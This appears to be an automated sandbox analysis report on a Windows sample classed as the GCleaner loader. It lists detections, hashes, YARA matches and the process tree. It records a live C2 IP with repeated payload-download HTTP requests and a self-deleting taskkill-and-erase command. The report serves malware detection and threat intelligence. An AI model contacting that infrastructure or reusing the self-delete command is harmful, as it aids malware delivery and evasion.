Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1500394
MD5:	e0e8e64dfad5b7dcae0d8c569c3995a2
SHA1:	307aa823e40f082fb0ff99fb6996d4f34c5abb45
SHA256:	9f860b523257827deceedaf7f95fba8e45e241602003ead07ad41727dbcd2f4c
Tags:	exe
Infos:

Detection

GCleaner

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected GCleaner

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

AV process strings found (often used to terminate AV products)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 5356 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E0E8E64DFAD5B7DCAE0D8C569C3995A2)

cmd.exe (PID: 1188 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3448 cmdline: taskkill /im "file.exe" /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

WerFault.exe (PID: 7072 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1504 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
GCleaner		No Attribution	https://bazaar.abuse.ch/browse/signature/GCleaner/ https://github.com/VenzoV/MalwareAnalysisReports/blob/main/GCleaner/GCleaner%20Techincal%20Analysis%20with%20BinaryNinja.md https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 https://n1ght-w0lf.github.io/malware%20analysis/gcleaner-loader/ https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/	https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner

Malware Configuration

Threatname: GCleaner

{"C2 addresses": ["80.66.75.114"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1680069236.0000000000740000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000000.00000002.2073463747.00000000007C4000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1180:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.file.exe.400000.0.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0.2.file.exe.5f0e67.1.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0.3.file.exe.740000.0.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0.2.file.exe.400000.0.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security

Code function: 0_2_004018E0 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar,

0_2_004018E0

Source: global traffic	HTTP traffic detected: GET /add?substr=one&s=two HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache

Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2073934684.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.66.75.114/
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.66.75.114/6.75.114/add?substr=one&s=two
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2073485392.0000000000893000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.66.75.114/add?substr=one&s=two
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.66.75.114/add?substr=one&s=twoi
Source: file.exe, 00000000.00000003.1905305826.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.66.75.114/files/download
Source: file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.66.75.114/files/download4/files/download
Source: file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.66.75.114/files/download4/files/downloadP
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.66.75.114/files/downloadData
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.66.75.114/files/downloadL
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.66.75.114/files/downloadLMEM
Source: file.exe, 00000000.00000003.1829531312.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1860003838.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.66.75.114/files/downloadN
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.66.75.114/files/downloadP
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.66.75.114/wi
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2073463747.00000000007C4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404530	0_2_00404530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00422900	0_2_00422900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004132D4	0_2_004132D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00413AB9	0_2_00413AB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004096D0	0_2_004096D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F9937	0_2_005F9937
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0060353B	0_2_0060353B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F4797	0_2_005F4797

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 004088D0 appears 38 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 005F8B37 appears 37 times

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1504

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2073463747.00000000007C4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/8@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007C51AE CreateToolhelp32Snapshot,Module32First,

0_2_007C51AE

Source: C:\Users\user\Desktop\file.exe

0_2_004018E0

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5600:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5356

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\57ec410c-7051-447b-81e9-c639cfb7f2c8

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Command line argument: `a}{	0_2_00404530
Source: C:\Users\user\Desktop\file.exe	Command line argument: P2@	0_2_00404530
Source: C:\Users\user\Desktop\file.exe	Command line argument: `a}{	0_2_005F4797
Source: C:\Users\user\Desktop\file.exe	Command line argument: ,zB	0_2_005F4797
Source: C:\Users\user\Desktop\file.exe	Command line argument: dyB	0_2_005F4797

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "file.exe")

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

Virustotal: Detection: 30%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1504
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

